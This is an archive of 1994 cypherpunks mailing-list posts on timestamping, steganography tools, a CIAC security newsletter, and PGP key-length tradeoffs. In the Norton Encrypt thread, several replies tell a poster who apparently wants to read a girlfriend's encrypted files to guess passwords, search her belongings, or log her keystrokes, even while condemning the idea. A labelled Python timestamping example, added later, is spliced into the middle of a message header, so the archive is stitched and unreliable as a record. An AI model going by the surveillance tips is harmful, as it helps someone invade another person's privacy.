From eric at remailer.net Fri Dec 23 08:39:03 1994
From: eric at remailer.net (Eric Hughes)
Date: Fri, 23 Dec 94 08:39:03 PST
Subject: Making sure a program gets to the receiver intact
In-Reply-To: <9412220711.AA21268@anon.penet.fi>
Message-ID: <199412231736.JAA20003@largo.remailer.net>

   From: an169306 at anon.penet.fi

   How can I insure a program, once put on FTP sites stays untampered with?

The best solution is not digital signatures but rather digital timestamping. The question is not persistence of authorship but rather persistence through time.

Digital timestamping is not keyed. The Haber-Stornetta algorithm uses only one way functions. The certificate the timestamping algorithm spits out gives a way of verifying that the modification state (yes/no) is the same as that of the timestamping root, shared by many participants. The assumption is that spoofing the root of the timestamp system is hard, exactly because it is shared widely.

The initial system published the root in the NYT announcements section. Since then, Haber and Stornetta have started Surety Technology, which is commercializing the patent. Their new system doesn't have a single point of failure at the root, it appears, but I don't know details.

The problem of detecting modification is not the same problem as assuring that version one was written by the same author as version two. The asker of the original question said nothing of versioning. The question applies to first versions as well, where persistence of identity is not at issue.

Digital signatures will work to affix a pattern of bits, but as with digital signatures, if the key is modified, so might be the signature. Yet digital signatures require private keys, which do persist through time, and so there is an issue of forward security.
The private key, if compromised, might be used to sign a statement that the signature on the binary was a forgery! With digital timestamping, no keying information exists to be compromised, so the affixation of bit pattern is permanent.

   The holes:

   1: Someone hacking the keyservers, substituting a key for all the people who signed, and modifying the archive to show that.

   2: Someone breaking into my apt, sticking a keyboard monitor on, getting my passphrase and key.

This is all a problem of economics. What is it worth to compromise the binary? How much does it cost to perform the compromises?

In fact the real problem is deeper. The binary, public key, and signatures can simply be entirely replicated. Now a person trying to distinguish between one binary/key/sig triple from the other must rely upon some social process to distinguish, which is not much different than the original problem of distinguishing two binaries claiming to be the same thing.

This is where digital timestamping shines. The timestamp algorithm yields time ordering of the various binaries. Now the discrimination problem between binaries can be resolved by choosing the _earlier_ one. We assume that the spoofer has only access to the public version in order to create an alteration. Note that this solution doesn't protect against an insider publishing a modified version before the actual release.

This is not to say that binaries shouldn't be signed. A common trojan horse attack on binaries is to release "bug-fix" versions. It is in this situation that the persistence of identity of authorship is important.

Eric

From eric at remailer.net Fri Dec 23 08:43:23 1994
From: eric at remailer.net (Eric Hughes)
Date: Fri, 23 Dec 94 08:43:23 PST
Subject: Is it possible to break Norton Encrypt??
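
[Added example, not part of any message in this archive.] The unkeyed timestamping argument in Eric Hughes's "Making sure a program gets to the receiver intact" message above, worked through in code: a certificate is checked against a widely held list of round values using only one-way functions, and two competing copies of a binary are resolved by taking the earlier stamp. The tree-plus-chain layout, SHA-256, and every name here (`TimestampService`, `verify`, `earliest`) are assumptions of this example, not the Haber-Stornetta or Surety design; the sample data is constructed.

```python
import hashlib
from dataclasses import dataclass

def digest(data: bytes) -> bytes:
    return hashlib.sha256(data).digest()

def H(tag: bytes, *parts: bytes) -> bytes:
    """Unkeyed one-way function; SHA-256 and the tagging are choices of this example."""
    d = hashlib.sha256(tag + b"\x00")
    for p in parts:
        d.update(len(p).to_bytes(4, "big") + p)
    return d.digest()

@dataclass
class Certificate:
    round_no: int  # index of the published value this stamp hangs from
    path: list     # [(sibling_hash, sibling_is_left), ...] from leaf up to the round root

def build_paths(leaves):
    """Hash the leaves into a tree; return (root, one authentication path per leaf)."""
    paths = [[] for _ in leaves]
    level = [(leaf, [i]) for i, leaf in enumerate(leaves)]
    while len(level) > 1:
        nxt = []
        for j in range(0, len(level), 2):
            if j + 1 == len(level):        # unpaired node is carried up unchanged
                nxt.append(level[j])
                continue
            (lh, li), (rh, ri) = level[j], level[j + 1]
            for i in li:
                paths[i].append((rh, False))
            for i in ri:
                paths[i].append((lh, True))
            nxt.append((H(b"node", lh, rh), li + ri))
        level = nxt
    return level[0][0], paths

class TimestampService:
    """Holds no key. Each round's value commits to the previous one and is published."""
    def __init__(self):
        self.published = [H(b"genesis")]   # index 0: starting value everyone holds

    def close_round(self, digests):
        if not digests:
            raise ValueError("a round needs at least one submission")
        root, paths = build_paths([H(b"leaf", d) for d in digests])
        self.published.append(H(b"link", self.published[-1], root))
        return [Certificate(len(self.published) - 1, p) for p in paths]

def verify(data: bytes, cert: Certificate, published) -> bool:
    """Recompute the round value from the data; compare with the verifier's own copy."""
    if not 1 <= cert.round_no < len(published):
        return False
    node = H(b"leaf", digest(data))
    for sibling, sibling_is_left in cert.path:
        node = H(b"node", sibling, node) if sibling_is_left else H(b"node", node, sibling)
    return H(b"link", published[cert.round_no - 1], node) == published[cert.round_no]

def earliest(candidates, published):
    """Among (name, data, cert) triples that verify, pick the one stamped first."""
    valid = [(c.round_no, name) for name, data, c in candidates if verify(data, c, published)]
    return min(valid)[1] if valid else None

def demo():
    release = b"constructed sample: program v1.0 as released by its author"
    altered = release + b" plus a later modification"
    svc = TimestampService()
    # Round 1: the author's digest is mixed with other participants' submissions.
    _, cert_release, _ = svc.close_round([digest(b"other-a"), digest(release), digest(b"other-b")])
    # Round 2: someone who only saw the public release stamps an altered copy.
    cert_altered, _ = svc.close_round([digest(altered), digest(b"other-c")])
    pub = list(svc.published)              # the verifier's own copy of the published values
    return {
        "release_verifies": verify(release, cert_release, pub),
        "altered_under_release_cert": verify(altered, cert_release, pub),
        "altered_own_stamp": (verify(altered, cert_altered, pub), cert_altered.round_no),
        "backdated_stamp": verify(altered, Certificate(1, cert_altered.path), pub),
        "chosen": earliest([("copy", altered, cert_altered),
                            ("original", release, cert_release)], pub),
    }

if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

The altered copy does carry a valid stamp of its own, which is why the decision rests on round order; as the message notes, that ordering gives no protection against a modified copy stamped before the real release.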
In-Reply-To: <941222003135.20215af5@SCSUD.CTSTATEU.EDU>
Message-ID: <199412231740.JAA20016@largo.remailer.net>

   From: "ADAM GERSTEIN, _THE_ MACGURU"

All this moralizing about the issue of breaking someone else's encrypted files seems to mask one important question:

Does anybody here know jack about Norton Encrypt?

Eric

From John.Schofield at sprawl.expressnet.org Fri Dec 23 09:38:11 1994
From: John.Schofield at sprawl.expressnet.org (John Schofield)
Date: Fri, 23 Dec 94 09:38:11 PST
Subject: Steganography Software
Message-ID: <5b3_9412230001@expressnet.org>

-----BEGIN PGP SIGNED MESSAGE-----

I am working on a review of the various steganography programs out there for the March/April issue of Keep Out magazine. I have a pretty good list of the stuff that's available in the DOS world, but I may have missed plenty of stuff available on the Internet.

If anyone is aware of later versions of these programs, or of a program not listed here that should be, *please* let me know. (Please include an FTP site and directory and/or a BBS to download it from.) I want this review to be as complete and accurate as possible.

Questions, comments, and suggestions are of course welcome.

Here's everything I have so far, including partial descriptions:

HDSK41.ZIP Hide and Seek v 4.1b. Data hiding/seeking using GIF files.

JSTEGV4.ZIP This version of the Independent JPEG Group's JPEG Software (release 4) has been modified for 1-bit steganography in JFIF output files.

MANDLEXE.ZIP MandelSteg V1.0, including GIFExtract V.10, for DOS. These two programs allow you to hide confidential data in fractal GIF images.

PGE10B.ZIP Pretty Good Envelope (P.G.E.) v1.0. PGE will "insert" your data into a GIF or JPG file.

S-TOOLS.ZIP S-Tools for Windows. Version 2.00. Steganography program for Windows. S-Tools (Steganography Tools) brings you the capability of `hiding' files within Windows sound files (.WAV), bitmap (.BMP) and CompuServe GIF files.
STEGO.ZIP Send encrypted messages and files which are undetectible and REQUIRE NO KEY! Programs and messages are submerged into a graphic file (usually a B/W TIF file). Once the object has been hidden the TIF appears unchanged. STEGODOS.ZIP StegoDos aka Black Wolf's Picture Encoder, Version 0.90b. For 320x200x256 only. WNS210.ZIP White Noise Storm: Data Encryption/Steganography package. You can use this to hide files in PCX pictures so nobody will see them. Thanks very much! John Schofield Publisher, Keep Out -----BEGIN PGP SIGNATURE----- Version: 2.7 Comment: Call 818-345-8640 voice for info on Keep Out magazine. iQCVAwUBLvp8M2j9fvT+ukJdAQHDkgP/Uh9aEhOz4Gu7FnUbFOTaOLAmlJBSRgjG 5nFRkWudlKejB/89tXFV64mg+iCPpkF9OJg1+szkzskPmRXmJ+K6WafBxlEAD9Tp I+vI/QAxQDT8XCn9e4fQ0QaEfp/Ek9GBZ2qSJvq6wbJmBM/iuLfHukEI7l9uSp/K KhAM9nnqbo8= =P+mn -----END PGP SIGNATURE----- **EZ-PGP v1.07 ... I thought about being born again, but mum said no. --- Blue Wave/RA v2.12 -- |Expressnet: John Schofield 11:310/12 |Internet: John.Schofield at sprawl.expressnet.org | | Standard disclaimer: The views of this user are strictly his own. From jdwilson at gold.chem.hawaii.edu Fri Dec 23 09:54:29 1994 From: jdwilson at gold.chem.hawaii.edu (NetSurfer) Date: Fri, 23 Dec 94 09:54:29 PST Subject: CIAC Notes 94-05 (fwd) Message-ID: <199412231759.MAA13801@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- I checked my mail and didn't find this posted to the list, so I'll send an abbreviated snip w/pointers for you. Interesting info... - -NetSurfer #include >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> == = = |James D. Wilson |V.PGP 2.7: 512/E12FCD 1994/03/17 > " " o " |P. O. 
Box 15432 | finger for full PGP key > " " / \ " |Honolulu, HI 96830 |====================================> \" "/ G \" |Serendipitous Solutions| Also NetSurfer at sersol.com > >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> - ---------- Forwarded message ---------- Date: Thu, 22 Dec 1994 16:30:38 -0800 From: VANLEHN at margay.llnl.gov To: jdwilson at gold.chem.hawaii.edu Subject: CIAC Notes 94-05 U.S. DOE's Computer Incident Advisory Capability Number 94-05 December 22, 1994 Welcome to the fifth issue of CIAC Notes, the United States Department of Energy's (DOE) Computer Incident Advisory Capability (CIAC) electronic publication for articles on relevant computer security topics. This "E-zine" is a service requested by our DOE and DOE contractor customers, and is open to subscription by anyone who can receive E-mail via the Internet. Hopefully we are giving you a gift of information to close out 1994. If you have topics you would like addressed or have feedback on this issue, please contact the editor, Allan L. Van Lehn, CIAC, (510) 422-8193 or send E-mail to ciac at llnl.gov. $-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$ $ Reference to any specific commercial product does not necessarily $ $ constitute or imply its endorsement, recommendation or favoring by $ $ CIAC, the University of California, or the United States Government.$ $-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$-$ TABLE OF CONTENTS Feature Articles How Trusting Can We Be? Internet Firewalls - Part 2 More On The Good Times Virus Hoax CIAC Plans To Have A Home Page In January Security Information Servers MAC / PC User PowerMAC Users Beware Data Physician Plus! 4.0E Available Novell Users OS/2 Systems Processing CLASSIFIED DATA CIAC Information Who Is CIAC?
CIAC Bulletins Issued Recently Subscribing To CIAC Electronic Publications Accessing CIAC's Electronic Information Servers Publications Available From CIAC Contacting CIAC

/snip/

>It is possible
>to create a file that remaps keys when displayed on a PC/MS-DOS machine with
>the ANSI.SYS driver loaded. However, this only works on PC/MS-DOS machines
>with the text displayed on the screen in text mode. It would not work in
>Windows or in most text editors or mailers. A key could be remapped to
>produce any command sequence when pressed, for example DEL or FORMAT.
>However, the command is not issued until the remapped key is pressed and the
>command issued by the remapped key would be visible on the screen. You could
>protect yourself by removing ANSI.SYS from the CONFIG.SYS file, but many DOS
>programs use the functionality of ANSI.SYS to control screen functions and
>colors. Windows programs are not affected by ANSI.SYS, though a DOS program
>running in Windows would be.

- ------------------------------

Security Information Servers

Novell:
  http://www.novell.com/cgi-bin/ftpsearch.pl?QString=security

Microsoft Windows:
  gopher://198.105.232.4:70/77%5Ckb%5Cperopsys%5Cwindows%5Cwindows.src?security
  gopher://198.105.232.4:70/77%5Ckb%5Cperopsys%5Cwindows%5Cwindows.src?patches

FIRST's WWW server:
  http://www.first.org/first/

NIST/CSRC
  http://cs-www.ncsl.nist.gov

Purdue Computer Emergency Response Team (PCERT)
  http://www.cs.purdue.edu/pcert/pcert.html

NASA Automated Systems Incident Response Capability (NASIRC) (this is accessible to *.nasa.gov systems only, but it can be accessed through the FIRST server or you can contact NASIRC to be added to their hosts.allow file)
  http://nasirc.nasa.gov/NASIRC_home.html

Naval Computer Incident Response Team (NAVCIRT)
  http://infosec.nosc.mil/niseeast/navcirt.html

Australian Computer Emergency Response Team (AUSCERT)
  http://www.auscert.org.au (Proposed to be up in a couple of weeks)
  http://www.uq.oz.au/pcc/services/sert/home.html (Currently active)

DFN-CERT
  German Home Page - http://www.cert.dfn.de/
  English Home Page - http://www.cert.dfn.de/eng/

Computer Emergency Response Team (CERT)
  http://www.sei.cmu.edu/SEI/programs/cert.html

Veterans Health Administration (VHA)
  http://www.va.gov

Small Business Administration (SBA)
  http://www.sbaonline.gov/

If you know of others, please send mail to ciac at llnl.gov.

/snip/

- ------------------------------

Data Physician Plus! 4.0E Available

All DOE sites should now have Data Physician Plus! 4.0E for use on IBM PC compatible systems. Contact your site CPPM if you have not obtained an update. This version does provide protection from the KAOS4 and One_half viruses (see CIAC Bulletin E-32 for further information on KAOS4 and E-34 for information on One_half).

- ------------------------------

Novell NetWare Users

CIAC is receiving more and more calls from our DOE clients asking for information on minimizing the risks associated with installing NetWare and in further connecting these LANs to the Internet. To supplement our own experiences CIAC is interested in partnering with other experts to create a comprehensive package of information that could be made available to all sites. If you have Novell NetWare expertise and would like to be a CIAC associate, please send a note to ciac at llnl.gov.

- ------------------------------

OS/2 Systems Processing CLASSIFIED DATA by Rollo D. Rogers [rogers at cod.nosc.mil]

SECURITY SAFEGUARDS FOR PROCESSING CLASSIFIED INFO ON A COMPUTER RUNNING OS/2 V2.1 [note: some sites may not allow internal hard disks for classified systems. ed]

- ------------------------------

CIAC INFORMATION

- ------------------------------

Who is CIAC?

CIAC is the U.S. Department of Energy's Computer Incident Advisory Capability.
Established in 1989, shortly after the Internet Worm, CIAC provides various computer security services free of charge to employees and contractors of the DOE, such as: o Incident Handling Consulting o Computer Security Information o On-site Workshops CIAC is located at Lawrence Livermore National Laboratory in Livermore, California, and is a part of its Computer Security Technology Center. CIAC is also a founding member of FIRST, the Forum of Incident Response and Security Teams, a global organization established to foster cooperation and coordination among computer security teams worldwide. Further information can be found at http://www.first.org/first/ - ------------------------------ CIAC Bulletins Issued recently CIAC issues two categories of computer security announcements: the information bulletin and the advisory notice. Information bulletins describe security vulnerabilities and recommend countermeasures. Advisory notices are more imperative, urging prompt action for actively exploited vulnerabilities. Advisory notices are delivered as quickly as possible via E-mail and FAX. F-01 Advisory SGI IRIX serial_ports Vulnerability Oct. 4, 1994, 1600 PDT F-02 Bulletin Summary of HP Security Bulletins Nov. 17, 1994, 1300 PDT F-03 Bulletin Restricted Distribution F-04 Bulletin Security Vulnerabilities in DECnet/OSI for OpenVMS Nov. 28, 1994, 0900 PDT F-05 Bulletin SCO Unix at, login, prwarn, sadc, and pt_chmod Patches Available Dec. 06, 1994, 0800 PDT F-06 Bulletin Novell UnixWare sadc, urestore, and suic_exec Vulnerabilities Dec. 14, 1994, 0800 PDT - ------------------------------ Contacting CIAC DOE and DOE contractor sites that require additional assistance or wish to report a vulnerability: call CIAC at 510-422-8193, fax messages to 510-423-8002 or send E-mail to ciac at llnl.gov. 
------------------- A - T - T - E - N - T - I - O - N --------------------- | For emergencies and off-hour assistance, CIAC is available 24-hours a day | | to DOE and DOE contractors via an integrated voicemail and SKYPAGE number.| | To use this service, dial 1-510-422-8193 or 1-800-759-7243 (SKYPAGE). The | | primary SKYPAGE PIN number, 8550070 is for the CIAC duty person. A second | | PIN, 8550074 is for the CIAC Project Leader. Keep these numbers handy. | --------------------------------------------------------------------------- - ------------------------------ CIAC's Electronic Publications Previous CIAC Bulletins and other information are available via anonymous FTP from ciac.llnl.gov. CIAC has several self-subscribing mailing lists for electronic publications: 1. CIAC-BULLETIN for Advisories, highest priority -time critical information and Bulletins, important computer security information; 2. CIAC-NOTES for Notes, a collection of computer security articles; 3. SPI-ANNOUNCE for official news about Security Profile Inspector (SPI) software updates, new features, distribution and availability; 4. SPI-NOTES, for discussion of problems and solutions regarding the use of SPI products. Our mailing lists are managed by a public domain software package called ListProcessor, which ignores E-mail header subject lines. To subscribe (add yourself) to one of our mailing lists, send requests of the following form: subscribe list-name LastName, FirstName PhoneNumber as the E-mail message body, substituting CIAC-BULLETIN, CIAC-NOTES, SPI-ANNOUNCE or SPI-NOTES for list-name and valid information for LastName FirstName and PhoneNumber. Send to: ciac-listproc at llnl.gov (not to: ciac at llnl.gov) e.g., subscribe ciac-notes O'Hara, Scarlett W. 404-555-1212 x36 subscribe ciac-bulletin O'Hara, Scarlett W. 404-555-1212 x36 You will receive an acknowledgment containing address, initial PIN, and information on how to change either of them, cancel your subscription, or get help. 
To subscribe an address which is a distribution list, first subscribe the person responsible for your distribution list. You will receive an acknowledgment (as described above). Change the address to the distribution list by sending a second E-mail request. As the body of this message, send the following request, substituting valid information for list-name, PIN, and address of the distribution list:. Send E-mail to ciac-listproc at llnl.gov: set list-name address PIN distribution_list_address e.g., set ciac-notes address 001860 rE-mailer at tara.georgia.orb To be removed from this mailing list, send the following request: unsubscribe list-name For more information, send the following request: help If you have any questions about this list, you may contact the list's owner: listmanager at cheetah.llnl.gov. - ------------------------------ Accessing CIAC's Electronic Information Servers CIAC operates a security information server for anonymous FTP at ciac.llnl.gov which contains all of the publicly available CIAC, CERT/cc, NIST, and DDN bulletins, virus descriptions, the virus-l moderated virus bulletin board, copies of public domain and shareware virus detection/protection software, copies of useful public domain and shareware utility programs, and patch files for some operating systems. Use FTP to access it either by name or IP address (128.115.19.53). The operation and prompt will depend on which vendor's FTP you are running. Usually, you must first log in before you can list directory contents and transfer files. Use "FTP" or "anonymous" for Name or Foreign username unless given a general prompt such as ciac.llnl.gov> or FTP>. In that case, enter the keyword "user" or "login" before "FTP" or "anonymous" (e.g., user FTP). Use your Internet E-mail address for the Password. Once logged in you may type a question mark to find out what key-words are recognized. 
The file 0-index.txt (in the top level directory /FTP) is a document explaining the directory structure for downloadable files. The file whatsnew.txt (in directory /FTP/pub/ciac) contains a list of the new files placed in the archive. Use the command get [for single files] or mget [for multiple files] to download one or more files to your own machine. - ------------------------------ Publications Available from CIAC CIAC prepares publications on a variety of computer security related topics, the CIAC 2300 series. Many of these will be updated as needed to keep the information current. We welcome suggestions for topics that you feel would be valuable. We also make available some documents from other sources. In the table below, column E is for electronic documents available via CIAC's servers (see above). Column P is for printed documents, for those who do not have Internet or telephone-modem access. If neither column is checked, the document is soon to be released. The electronic formats are: *.txt for ASCII, *.ps for PostScript(tm), *.hqx for bin-hexed Microsoft Word, *.wp5 for PC Word Perfect v5.0. No. E P TITLE 2300 x x Abstracts of the CIAC-2300 Series Documents 2301 x x Computer Virus Information Update 2302 Accessing The CIAC Computer Security Archives 2303 x x The Console Password Feature for DEC Workstations 2304 Data Security Vulnerabilities of Facsimile Machines and Digital Copiers 2305 Unix Incident Guide: How To Detect A Unix Intrusion 2308 Securing Internet Information Servers CIAC x Incident Handling Guidelines LLNL x User Accountability Statement, E. Eugene Schultz, Jr. SRI x Improving the Security of your Unix System, David A. Curry LLNL x Incident Handling Primer, Russell L. Brand ORNL x Terminal Servers and Network Security, Curtis E. Bemis & Lynn Hyman To obtain further information, contact Allan L. Van Lehn, CIAC, 510-422-8193 or send E-mail to ciac at llnl.gov. 
- ------------------------------ This document was prepared as an account of work sponsored by an agency of the United States Government. Neither the United States Government nor the University of California nor any of their employees, makes any warranty, express or implied, or assumes any legal liability or responsibility for the accuracy, completeness, or usefulness of any information, apparatus, product, or process disclosed, or represents that its use would not infringe privately owned rights. Reference herein to any specific commercial products, process, or service by trade name, trademark, manufacturer, or otherwise, does not necessarily constitute or imply its endorsement, recommendation or favoring by the United States Government or the University of California. The views and opinions of authors expressed herein do not necessarily state or reflect those of the United States Government or the University of California, and shall not be used for advertising or product endorsement purposes. - ------------------------------ End of CIAC Notes Number 94-05 94_12_22 **************************************** - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLvsP8CoZzwIn1bdtAQFmbgGAve2RmZmmVy+AtvHhLtdKBy/B5/7eyNDe h+eaysT6l7JUIX1x18BwM574UH+ibzYB =BnIF -----END PGP SIGNATURE----- From foodie at netcom.com Fri Dec 23 10:20:58 1994 From: foodie at netcom.com (Jamie Lawrence) Date: Fri, 23 Dec 94 10:20:58 PST Subject: Is it possible to break Norton Encrypt?? Message-ID: Bear with me, all. I am on my first cup of coffee. At 9:40 AM 12/23/94, Eric Hughes wrote: >Does anybody here know jack about Norton Encrypt? 
Well, I do have qualms about this, but I am assuming/hoping the original poster doesn't know what they are doing and wanted an answer like "Look in resource #164, dood" (call me a bleeding heart). Norton Encrypt for the Mac does have major problems. Key handling is botched such that the keyspace is significantly less than the full 56 bits specified, through what looks like a combination of inept implementation and perhaps outright bugs. I don't remember all the details, but I think NE converts to all lower case or some such, and discards anything past 8 characters of passphrase. There is a file on one of the crypto sites about NE. I would direct anyone interested to dig around some.

-j, whose next pastime this morning is helping con artists swindle old folks.

>Eric

-- On the internet, nobody knows you're a deity. __________________________________________________________ foodie at netcom.com

From rishab at dxm.ernet.in Fri Dec 23 10:53:13 1994
From: rishab at dxm.ernet.in (rishab at dxm.ernet.in)
Date: Fri, 23 Dec 94 10:53:13 PST
Subject: Attacking Norton Encrypt
Message-ID:

Regarding the simple question about Norton Encrypt's security (and ignoring the alt.relationship-counsellor interlude), I believe Norton uses DES (for 'maximum security') or a 'fast proprietary' method for convenience. I don't think it has the usual errors (password stored in ciphertext etc), but a brute force attack on DES is beyond the means of most Norton users IAC.
----------------------------------------------------------------------------- Rishab Aiyer Ghosh "In between the breaths is rishab at dxm.ernet.in the space where we live" rishab at arbornet.org - Lawrence Durrell Voice/Fax/Data +91 11 6853410 Voicemail +91 11 3760335 H 34C Saket, New Delhi 110017, INDIA

From mab at research.att.com Fri Dec 23 11:01:41 1994
From: mab at research.att.com (Matt Blaze)
Date: Fri, 23 Dec 94 11:01:41 PST
Subject: export adventure
Message-ID: <9412231901.AA03863@merckx.info.att.com>

Some of you may recall that about a month ago I posted the long and tortured story of my efforts to obtain a temporary export license for a so-called "exportable" telephone security device. I promised to report on what actually happened when I tried to go in and out of the country with the thing. Well, I just got back. I'm in the process of writing up the details, and I'll post a full account in the next few days, but the bottom line is that I've come to the conclusion that Kafka must have been trying to export something under one of these licenses when he wrote "The Trial". (Nothing bad happened, mind you, just a twisted maze of essential bureaucratic processes each more arcane than the last and all well beyond the grasp of humble travelers such as I).

-matt

From blane at seanet.com Fri Dec 23 12:21:20 1994
From: blane at seanet.com (Brian Lane)
Date: Fri, 23 Dec 94 12:21:20 PST
Subject: Attacking Norton Encrypt
In-Reply-To:
Message-ID:

On Fri, 23 Dec 1994 rishab at dxm.ernet.in wrote:
>
> Regarding the simple question about Norton Encrypt's security (and ignoring
> the alt.relationship-counsellor interlude), I believe Norton uses DES (for
> 'maximum security') or a 'fast proprietary' method for convenience. I don't
> think it has the usual errors (password stored in ciphertext etc), but a
> brute force attack on DES is beyond the means of most Norton users IAC.

Pardon me if someone else mentioned this (I just re-subscribed to the list).
If the person in question really wants to read his GF's private files his best bet would be to guess passwords, toss her purse/diary for the password written down, and all the other basic physical attacks available to him. Moral note: If he feels that this is necessary then this is definitely a relationship that should not continue (for her sake).

Brian

------------------------------------------------------------------------------ "Everyone is a prisoner holding their own key." | finger blane at seanet.com -- Journey | PGP 2.6 email accepted ------------------------------------------------------------------------------

From mab at research.att.com Fri Dec 23 12:25:24 1994
From: mab at research.att.com (Matt Blaze)
Date: Fri, 23 Dec 94 12:25:24 PST
Subject: Why I have a 512 bit PGP key
Message-ID: <9412232025.AA03925@merckx.info.att.com>

A while back, I generated a PGP key pair for use on my machine at work, a Sun SparcStation sitting on the reasonably-well-protected- from-outside-attack AT&T internal research network. I selected a key length of 512 bits. My number theory friends tell me that this is weak by modern standards; cracking my key would probably require within an order of magnitude of the total computational effort expended in the recent attack on RSA-129. I even volunteered my key as a ``target'' for the next such attack. Still, I'm happy with my choice, or rather, I've got so many other security things to worry about that compromise of my private mail based on cryptanalysis of my dinky little public key to obtain my private key is the last thing on my mind. In fact, I kind of like it that my key doesn't advertise pretensions of high theoretical security when, in fact, there is very little at all in practice. The first problem, of course, is secret storage. Modern networked computers are awful at storing secrets. (This, after all, is one of the problems that crypto software like PGP aims to solve).
I suspect my situation is reasonably typical, if not better than most. My computer at work sits on my desk (in my locked office), has its own local disk, only I know the root password, I try to keep up with the latest security patches, and I keep most of my files in encrypted form under CFS. I'm the only regular user of my workstation, and while I'm at work I access it directly from the console. The network to which it is attached is AT&T's ``R&D Internet'', the same one that sits behind the firewall described in Cheswick and Bellovin's great new book. I probably have at least average system administration and general computer security skills, and I'm reasonably good about practicing what I preach. Sounds like a pretty secure machine from which to run PGP, right? I don't think so. While my machine's operating system is pretty self-sufficient, my own home directory sits on a remote file server administered by people who are good at and have time to perform essential services for me like taking backups. This means that, no matter how hard I try, it's impossible for me to be sure that none of my files have been tampered with. We use off-the-shelf NFS, which means that for all practical purposes anyone with access inside the firewall (that's about 50k people in my case) can replace any of my files. Furthermore, even though my office has a lock, I'm not the only person in the world with the key (Bell Labs escrows office keys, after all), and I've managed to pick the lock once or twice on days when I left my key at home. I really have no idea where my machine has been or what software I'm typing at when I run PGP. So where should I store my private key? Well, I could, as some have suggested, keep it on a floppy disk that I carry around with me everywhere I go, but first of all, that's too inconvenient. It also sounds dangerous in practice. A floppy disk is about the size of a US passport, and I've already lost two of those. 
That means I'd have to replicate the key somehow anyway, so I might as well rely on the reasonably well established backup procedure that protects me from loss of the rest of the files in my home directory. For all practical purposes, I have to assume that my secret key file is public. That leaves the passphrase to protect the secret key. According to Shannon, English text contains just over 1 bit per letter of real information. Even if we assume twice that to account for the added twists and turns of phrase I'm inclined to add to a passphrase, I just can't remember (or type) a phrase with anywhere near enough entropy to approach the level needed to do justice to even a little 512 bit RSA key. I think the simplest cryptanalytic attack against me would be to go after the passphrase-based encryption of the secret key file. (You'd need a way to enumerate the most likely keys based on a hashed passphrase, which is a problem not yet well studied in the unclassified literature. I suspect a solution not out of reach of a determined adversary, however). An even simpler attack would be to break in to my machine and replace my copy of PGP (or my kernel, or my shell, or whatever) with one that records the passphrase as I type it. (No, I don't leave this as an exercise to the reader!) The next problem is with PGP itself. While I haven't looked carefully, it seems to be a well-engineered program, and it has a number of design features that I admire. However, I think the basic model it implements sits at two high a level, making it inherently unreliable for really sensitive traffic. It's just too hard to use. (Most of the problems could be fixed by pushing things to a lower level, and I understand a number of people are working on this). 
In particular, I'm have to have too much involvement in each PGP operation, and it's just too easy for me to do stupid things like:

- encrypting messages with the wrong public key
- sending the cleartext file instead of the ciphertext file
- leaving the cleartext file around in an unprotected file system
- including the passphrase in the message (especially when your fingers are so used to typing it all the time...)
- forgetting to use PGP at all
- typing a passphrase over a network connection (especially easy when you've got several windows open on several machines). Systems that use hardware keys (smartcards, etc) are less vulnerable to this

I've done each of these dumb things at least once, and probably others too.

Don't get me wrong - I advocate the use of strong encryption as much as the next nerd. I'm just concerned about focusing so narrowly that we lose sight of the larger security picture. Perry Metzger once made reference to cryptographic "size queens" who worry about key size and nothing else - it's a phrase that rings true.

There's something to be said for systems that chose their security parameters provide about the same strength everywhere. DES is a good example - a 128 bit key DES could be made that is no less secure than the current 56 bit version - by a few bits. The engineering triumph is that the "advertised" DES security parameter - the key size - tells close to the truth about the overall security of the system. (Of course, in RSA-based systems, there's an added variable - advances in factoring - that may make it prudent to include a significant margin for error, especially for keys that must retain their strength over time).

I have a 1024 bit key at home.
-matt From perry at imsi.com Fri Dec 23 12:26:35 1994 From: perry at imsi.com (Perry E. Metzger) Date: Fri, 23 Dec 94 12:26:35 PST Subject: reading someone's files Message-ID: <9412232026.AA22580@webster.imsi.com> Re: The Norton Encryption thread I'm surprised that no one has given the obvious answers on this topic. If you have physical access to someone's machine, it is trivial to find out what their encryption keys are.
After all, the victim types into the machine regularly -- recording all their keystrokes is not a difficult matter at all. Now, I agree with all the people who note that violating people's privacy is wrong and that this individual should get a new girlfriend rather than learning how to hack her files, but from a technical point of view there is no challenge here at all. Perry From mab at research.att.com Fri Dec 23 12:38:05 1994 From: mab at research.att.com (Matt Blaze) Date: Fri, 23 Dec 94 12:38:05 PST Subject: Why I have a 512 bit PGP key Message-ID: <9412232039.AA03986@merckx.info.att.com> [Speaking of dumb things: when I added my PGP key to the bottom of this file a few minutes ago, I attached it to the pre-proofread version and sent that instead of this one. Sigh. Here's the correct version.] A while back, I generated a PGP key pair for use on my machine at work, a Sun SparcStation sitting on the reasonably-well-protected- from-outside-attack AT&T internal research network. I selected a key length of 512 bits. My number theory friends tell me that this is weak by modern standards; cracking my key would probably require within an order of magnitude of the total computational effort expended in the recent attack on RSA-129. I even volunteered my key as a ``target'' for the next such attack. Still, I'm happy with my choice, or rather, I've got so many other security things to worry about that compromise of my private mail based on cryptanalysis of my dinky little public key to obtain my private key is the last thing on my mind. In fact, I kind of like it that my key doesn't advertise pretensions of high theoretical security when, in fact, there is very little at all in practice. The first problem, of course, is secret storage. Modern networked computers are awful at storing secrets. (This, after all, is one of the problems that crypto software like PGP aims to solve). I suspect my situation is reasonably typical, if not better than most. 
